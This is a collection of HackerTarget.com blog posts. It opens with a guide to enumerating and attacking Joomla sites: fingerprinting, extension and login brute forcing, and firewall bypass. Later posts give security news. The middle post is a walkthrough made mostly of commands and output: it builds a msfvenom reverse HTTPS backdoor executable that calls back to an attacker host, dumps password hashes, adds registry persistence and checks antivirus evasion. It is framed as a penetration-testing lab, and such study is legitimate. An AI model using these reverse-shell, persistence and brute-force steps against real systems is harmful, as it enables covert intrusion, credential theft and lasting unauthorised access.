Additionally, penetration testers or red teams needing to exploit Joomla targets will also find practical hints in this guide.

Introduction to Joomla Security

Recent statistics show Joomla is a popular open-source Content Management System (CMS), with close to 6% of all websites.

It is open-source, free to download, and easy to use. These things make it a popular option. Similar to WordPress's plugins, Joomla allows functionality through "Extensions"

This popularity makes it a target for bad guys aiming to use a compromised web server for malicious purposes.

A lot of Joomla security holes arise from lack of maintenance, not taking passwords seriously, poorly coded extensions and even site backup's left in the web root.

Enumeration and Reconnaissance

Stage 1 is to discover as much technical information regarding the site configuration. This information is essential as it will aid us as we move onto the actual attacking or exploitation phase.

Now is the time to put yourself in the hacker's mindset. Enumeration or reconnaissance can be conducted stealthily with regular web requests used to gather technical information about the site. Or it can be conducted overtly by aggressively brute-forcing web paths to identify the presence of extensions.

Joomla Identification & Version

To determine if the site is running Joomla, and identify the Joomla Core version, three simple methods can be used to determine the version of Joomla in use.

Meta Generator

Check the HTML source of the page for a meta generator tag in the HEAD section of the HTML source. This is the simplest way to determine if Joomla is being used.

This example is taken from the source of a default Joomla install.

<meta name="generator" content="Joomla! - Open Source Content Management" />

joomla.xml

To identify the version we can check the joomla.xml file within the directory /administrator/manifests/files/

https://www.joomla.org/administrator/manifests/files/joomla.xml

Result

/language/en-GB/en-GB.xml

Another option to find the version is the language file.

https://example.site/language/en-GB/en-GB.xml
<version> 3.6.5 </version>

Version in README.txt

If the meta tag has been disabled, check for the presence of /README.txt from the web root of the install. Joomla has the major version at the top of the ReadMe file.

Security Vulnerabilities in Joomla Core

Let's say a site with an older Joomla Core version is discovered by an attacker. This site may be directly exploitable via a security vulnerability in the Joomla core. It also shows the site is not being well maintained.

In a poorly maintained site, other components, such as Extensions or Templates, may not be updated. The likelihood of a successful attack has dramatically improved.

Joomla Extension and version Enumeration

Similar to WordPress's plugins, Joomla allows functionality through "Extensions"
Extensions are broken down into a few types:

• Modules
• Components
• Templates
• Plugins
• Languages

All can be installed as required. Vulnerabilities can arise in any of these when poorly coded, an example could be non-logged in users having access to the same features as logged in users.

Enumeration is attempting to find as many installed extensions as we can, including disabled extensions. Knowing these extensions may allow us to identify the version, and research whether it is vulnerable to known exploits.

Unfortunately, unless you have the administrator account details, there is no easy way to find every single extension of a particular Joomla install.

It is worth noting Joomla has a live list called - Vulnerable Extensions List (VEL)
This list is of vulnerable extensions for which no patch is known to exist. It can be used as a source of information or a place to start when looking at a Joomla site.

Passive

Hints to the extensions and modules present in a site may be found in the HTML source of the page. Once, an add-on is identified additional information can be gathered from the manifest file.

Active

Some extensions do not leave traces in the HTML source. To find all the installed extensions you have to be more aggressive. Several tools can brute force known extension/component list. There is no one size fits all when it comes to Joomla. Using a combination of available tools will get the best results.

One example is the Metasploit Joomla Plugin Scanner. This metasploit auxiliary module uses a wordlist to locate valid paths scanning for extensions and vulnerabilities.

Extension Version Enumeration

You have compiled a list of extensions of the site, now for the version. The design of Joomla means this information isn't forthcoming or comprehensive, especially when attempting to find it quietly.

It is possible you may find the extension version in a manifest file or other resources such as the addon's stylesheets or javascript.

With a valid version you can compare what has been found against known exploits. This comparison will attest if the site is likely vulnerable, before throwing any exploits.

Joomla Template Enumeration

As with extensions, Joomla Templates can contain vulnerabilities that may expose the site to compromise. Templates are simply collections of PHP code with HTML and CSS resources. Complex templates have additional components and are more prone to security vulnerabilities.

Enumeration of the template is conducted similarly to detecting the extensions. Inspect the HTML and locate the template. Alternatively, run a passive scan on Hacker Target's Joomla Security Scan and scroll through results to find the Joomla Template.

One important factor when testing for vulnerable Joomla Templates and components is where it may be installed but not active; as the code is still accessible it may still be vulnerable. For this reason, brute force testing for template paths is an additional step when assessing an unknown Joomla installation.

Enumerate Users

A quick tip is first see if the Administrator login page is publicly available.

https://exampledomain.com/administrator

Gather a list of valid usernames and attempt a password guessing attack to brute force the login credentials. The aim is to gain access to the administrator account. Admin access gives the attacker complete access, and consequently a full compromise of the site, the database, and remote code execution on the server through PHP code execution.

There is no simple way to do this manually in Joomla as opposed to WordPress where it may be possible to iterate through the users using a simple bash one-liner.

With Joomla, it requires guesswork. All new installs have a 'Super Administrator account' called admin. As part of the install, Joomla requests a password for this account. Joomla also suggests changing the name of the account from 'admin' to something more difficult to guess.

This makes it complicated for a dictionary-based attack against the admin panel.

Enumerating users through Guessing

Start with the common one admin and go from there.

Joomla doesn't seem to allow direct listing all users and / or leak their information.

A default install of Joomla allows 3 privileged user groups which have access to the control panel:

• Managers: content creation and backend system info.
• Administrators: admin functions except global options.
• Super Users/Administrator: ultimate power. Access all areas.

Note: from version 3.2 two-factor authentication was implemented as a core feature. Admins can enable it from User Manager in the Control Panel.

Password Re-use and Breach Datasets

A common technique used in targeted attacks is mining breach datasets for passwords. If a user is breached on another site, there is a chance they will use the same password or a variation on the password on other sites. Working from a targeted domain passwords can quickly be found especially in larger organisations.

Directory Indexing

A misconfigured server can allow you to view the contents of a directory in a web-accessible path.

Viewing the contents of the directory allows an attacker to gather sensitive information not intended for public viewing about the existence and contents of the files. Such as hidden files, backup files, config files, plugins, and templates, without the need to brute force the paths.

Start by browsing to folder locations and see if you get a 200 OK HTTP response and see a list of files / folders in the browser.

Network Service Discovery

Here we are checking network services. The main technique used for identifying the servers attack surface is Port Scanning.

An Nmap port scan will identify the network services listening on the server. These could include FTP, SSH, Webmin or even the web server itself. Working from the results of the Port Scan an attacker would identify server applications, versions and look for exploitation opportunities.

Bypass Sucuri or CloudFlare Web Firewall

If the Joomla site is protected by Sucuri or CloudFlare, exploits that might otherwise succeeed could be blocked. Even various reconnaissance techniques can be blocked by these web based firewall (WAF).

By knowing the real IP address of the server it is likely we could bypass the server simply by putting an entry in the clients /etc/hosts file. This works because we bypass the sites DNS that would otherwise send us via the Web Firewall.

Historical DNS Records

A common method is using historical DNS records to identify the real IP address.

Historical DNS records may show the original IP address before the firewall service was implemented.
Mail Records (MX), if mail is hosted on the same server as the website then this will reveal the real host
TXT SPF, records might also reveal IP addresses of interest

TLS / SSL Certificate Searches

TLS / SSL searches against Certificate Transparency Datasets may also find real hostnames associated with the sites actual IP address if they can matched.

JoomlaVS & Other Tools

Passive Joomla Security Scan

Hacker Target hosts a free and simple to use passive Joomla scan. Discover vulnerabilities, web server details, configuration errors, identify template, and test for directory indexing and others.

The freely available tools perform analysis from a simple page grab. Through the examination of the HTML source code, javascript, and a few other open publicly accessible pages, it is possible to gain immediate insights into the state of security on the target site. This is applying only passive analysis methods, without sending any aggressive security scanning.

JoomScan

JoomScan is the OWASP Joomla! Vulnerability Scanner. An open source project written in Perl. Ties some of these enumeration techniques together such as the Joomla version, vulnerabilities and the admin login page.

Check out the the latest version from github https://github.com/rezasp/joomscan

Note this project has not been updated for a number of years

JoomlaVS

JoomlaVS is an Open source Ruby application. Scan for vulnerabilities in components, modules and templates and basic fingerprinting. More info available on the projects at https://github.com/rastating/joomlavs

----------------------------------------------------------------------

     ??? ???????  ??????? ????   ???????      ?????? ???   ???????????
     ?????????????????????????? ????????     ???????????   ???????????
     ??????   ??????   ?????????????????     ???????????   ???????????
??   ??????   ??????   ?????????????????     ???????????? ????????????
????????????????????????????? ??? ??????????????  ??? ??????? ????????
 ??????  ???????  ??????? ???     ??????????????  ???  ?????  ????????

----------------------------------------------------------------------

[+] URL: http://testexample.com/
[+] Started: Mon Jun 12 11:02:01 2020

[+] Found 1 interesting headers.
 |  Server: Apache

[+] Joomla version 2.5.30 identified from language file (en-GB.xml)
[!] Found 8 vulnerabilities affecting this version of Joomla!

[!] Title: Joomla Akeeba Kickstart Unserialize Remote Code Execution
 |  Reference: https://www.exploit-db.com/exploits/35033
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-7228
[i] Fixed in: 3.3.5


[!] Title: Joomla Media Manager File Upload Vulnerability
 |  Reference: https://www.exploit-db.com/exploits/27610
 |  Reference: http://www.cvedetails.com/cve/CVE-2013-5576
[i] Fixed in: 3.1.5


[!] Title: Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities
 |  Reference: https://www.exploit-db.com/exploits/37473
[i] Fixed in: 3


[!] Title: Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution
 |  Reference: https://www.exploit-db.com/exploits/38977
 |  Reference: http://www.cvedetails.com/cve/CVE-2015-8562
[i] Fixed in: 3.4.6


[!] Title: Remote Code Execution in third-party PHPMailer library
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-10033
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-10045
[i] Fixed in: 3.6.5


[!] Title: Unauthorised Logins
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-6632
[i] Fixed in: 3.3.3


[!] Title: Denial of Service
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-7229
[i] Fixed in: 3.3.4


[!] Title: Joomla! < 3.6.4 Privilege Escalation
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-9838
[i] Fixed in: 3.6.4


[+] Scanning for vulnerable components...
[!] Found 0 vulnerable components.

------------------------------------------------------------------

[+] Scanning for vulnerable modules...
[!] Found 0 vulnerable modules.

------------------------------------------------------------------

[+] Scanning for vulnerable templates...
[!] Found 0 vulnerable templates.

------------------------------------------------------------------

[+] Finished

CMSMap

As the name implies, CMSMap covers the most popular of the CMS's. An open source project written in Python, this tool has support for Joomla, WordPress and Drupal. Useful for automating a scan for low-hanging fruit.

Download the latest version of CMSMap github: 

git clone https://github.com/Dionach/CMSmap 

Attacking and Exploitation

Brute Force Joomla logins

2013 Joomla 3.2 stable release bought 2FA as part of the core install which adds another challenge to brute-forcing an account. But it isn't enabled by default.

Popping Weak Passwords

Detecting weak passwords for Joomla comes in a variety of ways. There are many ways to to brute force a login page, here are a few.

Nmap NSE Scripts for Joomla

NMAP is most known for network discovery, however, NSE scripts extend the functionality of the popular NMAP port scanner. An Nmap NSE script is particularly helpful for performing a brute-force password play against a Joomla install.

• http-joomla-brute.html
• http-form-brute

    $ nmap -p80 http-joomla-brute example-site

Burpsuite

If there is a login form on the site or you have found the administrator interface, then burp suite can be used to try to brute force the password.

There are other tools around such as JoomBrute, and others such as Hydra and Ncrack, though the latter two are most suited for other protocols.

Metasploit

Rapid7's Metasploit provides a few modules for brute forcing CMS and Joomla for various Joomla versions. One is the Joomla Bruteforce login utility

msf > use auxiliary/scanner/http/joomla_bruteforce_login

Exploit Joomla Extensions

One of the most common reasons for Joomla sites being compromised is vulnerable extensions, modules & plugins. These all contain a large amount of PHP code and come from developers of differing levels of skills, abilities, and focus when it comes to writing software that is secure.

Keeping the Joomla extensions, core and templates updated and/or patched needs to be a routine task for the Joomla administrator of the site.

1,437
published exploits for
Joomla and its components

Joomla Security announcements and Vulnerable extensions list

The Joomla Developer Network has a Security Announcements which provides a feed of recently resolved security issues in Joomla software releases.

As part of the Joomla extension directory, Joomla has a list of Vulnerable extensions .

Exploit Example

An issue was discovered in the Creative Contact Form extension (2019). A directory traversal vulnerability resides in the filename field for uploaded attachments. An attacker could exploit this vulnerability with the "Send me a copy" option to receive any files of the filesystem via email.

Exploit References:
https://packetstormsecurity.com/files/156655/Creative-Contact-Form-4.6.2-Directory-Traversal.html
https://nvd.nist.gov/vuln/detail/CVE-2020-9364#VulnChangeHistorySection

Exploit Joomla Template

While vulnerabilities in templates are not as common as extensions, it is still worth checking the template in use. Check the developers page for security related updates, and if its a custom environment running standard web application testing may discover unpublished vulnerabilities.

In this example of an XSS vulnerability, we see that even the Joomla Core Default template had a vulnerability as recently as 2019.

Exploit References:
https://developer.joomla.org/security-centre/791-20190901-core-xss-in-logo-parameter-of-default-templates.html

Exploiting Joomla Core

Vulnerabilities in Joomla Core are highly valued by an Attacker as it does not depend on a particular extension being installed.

In 2016, 2 critical vulnerabilities allowed privilege escalation by remote users. Attackers were first able to create accounts even if account registration is disabled, and 2nd, increase their privileges on any Joomla site using versions 3.4.4 to 3.6.3. Attackers could then upload a backdoor and ultimately control the site.

Solution was the upgrade to version 3.6.4. Joomla devs released limited information on the the vulnerabilities, however it was enough for groups to figure things out and develop exploits. Exploits in the wild were spotted, some included ones that were automatically uploading backdoors to vulnerable sites.

Exploit References:
CVE-2016-8870
CVE-2016-8869
Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation

Sniff and Capture Credentials over non-secure login

HTTP over TLS should be enabled on any public website in 2020. If only HTTP is used, passwords, logins and session cookies are all sent over the network in the clear. Clear text sessions could be monitored on your local network, or on your Internet providers network or anywhere between the client and server.

With the easy access to Free certificates there is really no reason to be not using HTTPS. Check your TLS configuration with tools such as sslyze.

Vulnerable Server Software

Exploitation of the Joomla site could come from other server components - it is not always the Joomla Web Application that will be the exploitation vector. A simple misconfiguration of a network service or a failure to apply server updates could lead to compromise of the server and all hosted applications.

With the results of an Nmap scan, an attacker will review open services for known vulnerabilities. A small sample of these network services includes FTP, SSH, MySQL & Redis - any of these could lead to server compromise if vulnerable or poorly configured.

Compromise Systems Administration Tools

Related to the previous section, here we are identifying server applications that may lead to compromise of the Joomla site.

An example of this type of tool is phpmyadmin running on the web server. A weak database password or vulnerable version of phpmyadmin would lead to compromise of the database and possibly even code execution.

Discovery of the phpmyadmin installation would usually involve a content discovery scan that would include common paths for phpmyadmin in the content discovery scanner list.

Content Discovery

Looking for sensitive information, database credentials, backups, are just a few few items that can be found with content discovery. Content discovery is attempting to find any interesting items contained within a web path of an application. There are a variety of tools our there catering for this purpose. Choose the one or ones that suit your needs. A few example tools are; DIRB, dirbustor, dirsearch or gobuster.

Common locations to check are:

    /robot.txt
    /backup
    /images/
    /bin/
    /uploads/
    /components/
    /administrator/
    /.htaccess.txt
    /index.html
    /index.php
    /templates/exampletemplate
    /administrator/templates/exampletemplate
    /phpmyadmin/
    /phpinfo.php

Found Backups

Using content discovery a commonly found vulnerability is a site backup. This results from a mistake during system administration where a backup of the folder was taken and left in the publicly accessible web root (eg. /backup.tar.gz).

With a backup an attacker has access to all files of the installation including all installed components as well as the configuration file containing the database location and password.

PHP info

Another commonly found item during content discovery is a file with the PHP function phpinfo(). Site administrators will often create a file in the root of the site such as /phpinfo.php, the function in this file allows the administrator to know what modules, PHP version and many other server configurations are available on the webserver. This information is also valuable to an attacker if the file is forgotten and left on the server.

The post Attacking and Enumerating Joomla appeared first on HackerTarget.com.

Joomla is a popular content management system; that is very extensible. This popularity and wide range of extensions makes it a popular target for hackers.

The Joomscan tool has the following features:

• Exact version Detection - the scanner can pinpoint versions with a greater accuracy than just the meta generator tag.
• Joomla! based web application firewall plugin detection
• Probes for known vulnerable Joomla Core security issues as well as extensions / plugins

Back in 2009 HackerTarget.com had the Joomscan scanner as a free scanning tool, however due to abuse we decided to dis-continue the tool. With a recent update we have decided to make this version an extension of our current non-intrusive tool. Use of the active Joomscan component will require a valid HackerTarget.com membership. This will ensure any abuse of the tool is limited; and will provide a better experience for all our users.

Joomscan is a perl based tool that anyone can download and install. Why not give it a go yourself. Head over to the project page and start your own testing.

The post Joomscan added to the online Joomla Security Scan appeared first on HackerTarget.com.

Let's first look at a common locked down Corporate Network. Then we will show how pwnage is not difficult with this new Payload.

Lab Setup

I am simulating the network with 3 virtual guest machines and the host Ubuntu Linux system. 1 virtual guest will act as the Firewall and Proxy, while the 2 other guests are Windows clients that will be the targets. The laptop host in this lab is the attacker on the Internet.

On the virtual gateway Smoothwall box I configured DHCP, Proxy, Snort and Firewall Rules to block outbound traffic. Only opened 22 (for sftp) and proxy port (tcp 800). This has simulated the corporate network in the diagram above.

Build the malicious exe

Now build the malicious executable.

In this test we are building an exe to launch the Payload. Code execution on the client host could be accomplished in many ways, exploitation via social engineering, emailed links with malicious java applets, client based exploits etc.

On the Laptop I am running Metasploit Framework 3.7.2.

/opt/framework-3.7.2/msf3# msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=192.168.56.1 LPORT=443 > evil_https.exe

Listen

Now to setup the listener on the laptop.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler...
msf exploit(handler) >

Use scp or whatever to copy evil_https.exe to the Windows XP system and then run it.

Back in the console on the Linux host we see.

[*] 192.168.56.101:43681 Request received for /INITM...
[*] 192.168.56.101:43681 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:43681) at Fri Jul 15 12:09:01 +1000 2011

meterpreter > hashdump
Administrator:500:aad3b435b51404eexad3e435t51404ee:31d6cse0dfe6ae931b73c5ed7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e4c292ecc2957ce7fb630fc6166aa510:235f3388ca0a29e8494d047362de1507:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c77865e3c4b213df710209775e335e62:::

evil_https.exe connected to the listener on Laptop. All communication took place over the proxy. Looking at netstat on the client XP machine we only see HTTPS connections to the proxy. A very normal type of connection.

How solid is the connection? Lets reboot the smoothwall proxy host.

Meterpreter session appears to hang during the reboot. Type a command; wait.... success!! The session over the proxy using HTTPS is re-established. I did not have to re-run executable.

meterpreter > ipconfig

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:70:63:0d
IP Address : 10.10.10.199
Netmask : 255.255.255.0

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

meterpreter > screenshot
Screenshot saved to: /opt/framework-3.7.2/msf3/bFjkdUHa.jpeg

Persistent

Lets improve things and make it persistent on the client so that when the corporate user takes his laptop home we get a session from home, and then another session the next morning from the corporate network.

These commands manipulate the registry and will add evil_https.exe to the start-up programs on the client XP machine.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (1):

VBoxTray

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v evil -d 'C:\windows\evil_https.exe'
Successful set evil.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (3):

VBoxTray
evil

meterpreter >

Next I rebooted Windows XP and we received a new session on the listener after the reboot.

msf exploit(handler) >
[*] 192.168.56.101:55182 Request received for /INITM...
[*] 192.168.56.101:55182 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:55182) at Fri Jul 15 12:43:31 +1000 2011

Nice, now as mentioned in the release blog post it should also be possible to quit out of the metasploit console and re-establish a session without touching the WinXP box.

I quit from Metasploit Console. Went and had some lunch.

Ok, after a great lunch I fired up the msfconsole using the same settings as before. I do not touch the XP machine.

/opt/framework-3.7.2/msf3# ./msfconsole

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 711 exploits - 360 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13116 updated 8 days ago (2011.07.07)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler...
msf exploit(handler) >
[*] 192.168.56.101:40252 Request received for /CONN_pJGJgpWGAzUlDCTZ/...
[*] Incoming orphaned session CONN_pJGJgpWGAzUlDCTZ, reattaching...
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:40252) at Fri Jul 15 13:57:34 +1000 2011

Wow, that is nice the client machine reconnected. This new payload is stable and undeniably dangerous.

Righto, same deal on fully patched Windows7 Enterprise with "Work Network Settings" (no Anti-Virus).

meterpreter >
[*] 192.168.56.101:50910 Request received for /INITM...
[*] 192.168.56.101:50910 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:50910) at Fri Jul 15 14:22:07 +1000 2011

meterpreter >
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:ef:f4:61
IP Address : 10.10.10.198
Netmask : 255.255.255.0

meterpreter > sysinfo
System Language : en_AU
OS : Windows 7 (Build 7600).
Computer : TEST-VM2
Architecture : x86
Meterpreter : x86/win32
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >

Booya!

Note that both the client systems were not running any Anti-virus. The executable may have been blocked if they were.

Lets check virustotal.com. Remember this is a vanilla payload from msfvenom. I have not used exe templates or attempted additional tricks to avoid Anti-virus detection.

Quite a few anti-virus programs detected the executable as dangerous (27 out of 43). Let's have a closer look at corporate favourites like Symantec and Trend.

Symantec and Trend did not detect the executable as dangerous.

The post Backdoor Corporate Networks with Metasploit appeared first on HackerTarget.com.

This is a good example of current threats that website operators as well as end users should all be aware of, a high profile site gets hacked and poses a signifcant threat to the end user.

Once downloaded and run, the PDF files exploit a vulnerability and make the system download a version of the ever-so-popular ZeuS Trojan.

According to Trend Micro's Rik Ferguson, the server in question is located in Germany and is hosted by Netdirect - not a stranger to hosting malicious sites.

A few hours ago, TechCrunch tweeted that they "are aware of the (annoying) malware warning about the @TCEurope site", and that they are trying to fix it.

The awkward phrasing makes me think they thought at the time that there was some kind of mistake and not a legitimate warning. The site hasn't been taken down in the meantime, and there is no official
update on the situation.

Ferguson warns that the ZeuS variant is currently detected by only 2 out of 43 anti-malware solutions used by VirusTotal, so it's best to avoid the site altogether until they manage to clean its code.

TechCrunch Europe hacked, serving malware

The post TechCrunch Europe hacked appeared first on HackerTarget.com.

From the Matrix:
Trinity: Hello Neo.
Neo:How do you know that name
Trinity: I know a lot about you
Neo: Who are you?
Trinity: My name's Trinity
Neo: Trinity...THE Trinity? The one who hacked the IRS D-Base?
Trinity: That was a long time ago
Neo: Jesus
Trinity: What?
Neo: I just thought...you were a guy
Trinity: Most guys do

To the horror of Latvia’s political establishment, a mysterious group of computer hackers is threatening to expose the incomes of top officials after stealing millions of government tax records.

The group, calling itself the People’s Army of the Fourth Awakening, claimed to have downloaded more than 7.5 million documents, including VAT receipts and income tax returns, from the State Revenue Service
(SRS) after exploiting a security loophole on its website.

One hacker used the name Neo, in apparent tribute to the hero of The Matrix science-fiction films, in which a vast system for enslaving humanity is exposed. He or she claimed that the documents revealed the
extent of official hypocrisy over belt-tightening reforms introduced as Latvia’s economy reeled under the impact of the global economic crisis. “The purpose of the group is to unmask those who gutted the country,”
Neo told the Latvian television current affairs programme Kas Notiek Latvija in an interview posted on its website.

Neo has been hailed as a digital Robin Hood by disgruntled Latvians after posting details from the documents on the internet to contrast the earnings of top officials with cuts experienced by other workers.

Reuters - Latvia web hacker nabbed after baring officals pay

The post When Neo Hacked the Latvian SRS Database appeared first on HackerTarget.com.

Based on Ubuntu and well tested this is an outstanding release, and we wish the Offensive Security Team all the best with the 2010.

Download Back-Track now and get cracking with some serious Security Testing. Explore the Offensive-Security, Back-Track websites, and the forums for Guides, Tutorials and FAQ's.

Real security can only be achieved through awareness, knowledge and some clever tools.

The post BackTrack 4 Release appeared first on HackerTarget.com.

Several high-profile hacks over the past year including;

• Heartland Payment Systems
• Hannaford Bros.
• 7-11

All have had one thing in common: they were launched with a SQL injection attack.

Cross-site scripting (XSS) had been the king of Web attack techniques for some time, and for good reason -- the ability to steal user credentials, hijack active Web sessions and take action on behalf of a user without their knowledge is particularly nasty. But the classic SQL injection attack has regained the lead as the most popular of Web attacks. Most of all reported Web breaches the first half of this year, according to the new Web Hacking Incidents Database (WHID) report, were conducted via SQL injection. And SQL injection is one of the most common vulnerabilities in Web applications today.

Link to article referenced above

Dark Reading - SQL Injection Demystified

The post SQL Injection Demystified appeared first on HackerTarget.com.

Researchers at security firm Finjan said on Wednesday that they have uncovered an underground botnet-leasing network where cyber criminals can pay $5 to $100 to install malware on 1,000 PCs for things like stealing data and sending spam.

The Golden Cash network, dubbed "Your money-making machine" on its home page, sells access to botnets comprised of thousands of compromised PCs to cyber criminals for custom malware spreading jobs, according to issue 2 of the Cybercrime Intelligence Report for 2009.

Here's how it works: a cyber criminal creates a botnet by hiding malicious code in a legitimate Web site that is used to turn Web surfing PCs into zombies. The code, typically an iFrame, points the PCs to a separate Web site where they are then infected with a Trojan backdoor
that reports back to the Golden Cash command and control server.

'Golden Cash' botnet-leasing network uncovered

The post ‘Golden Cash’ botnet-leasing network uncovered appeared first on HackerTarget.com.

It seems that like any web hosting service the Amazon Cloud Web Services are open to exploitation. Of course in this post I am not saying that amazon is attacking or even the owner of this slice of the cloud is attacking me, they likely have had their slice compromised and it is now being used to launch those pesky ssh brute force attacks that fill up all our logs.

This popped into my inbox today from one of my ossec sensors:

OSSEC HIDS Notification.
2009 Jun 17 15:53:48

Received From: htarget02->/var/log/auth.log
Rule: 5551 fired (level 10) -> "Multiple failed logins in a small period of time."
Portion of the log(s):

Jun 17 15:53:47 htarget02 sshd[10047]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:44 htarget02 sshd[10045]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:42 htarget02 sshd[10043]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:39 htarget02 sshd[10041]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:37 htarget02 sshd[10039]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:35 htarget02 sshd[10037]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root
Jun 17 15:53:32 htarget02 sshd[10035]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-67-202-57-35.compute-1.amazonaws.com  user=root

Here is a good article on securing your AWS instance including improving your sshd security.

The post Amazon Cloud Service Brute Force appeared first on HackerTarget.com.

This is yet another example of simple security errors resulting in mass hacks of websites. The attackers ultimate purpose is the installation of trojans onto end user machines. The trojans are then used in bot armies, or for collection of data, passwords and financial accounts from keystroke loggers.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means it is crucial to verify what information gets stored in, or requested from, those databases — especially if users are allowed to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, and other area of dynamic websites.

Unless that data is sanitized before it gets saved, it is impossible to control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls.

References

--> F-Secure Labs: Details of the hack
--> SANS ISC Infofec forum article

The post Another mass hack – MSSQL injection compromises 500’000+ web sites appeared first on HackerTarget.com.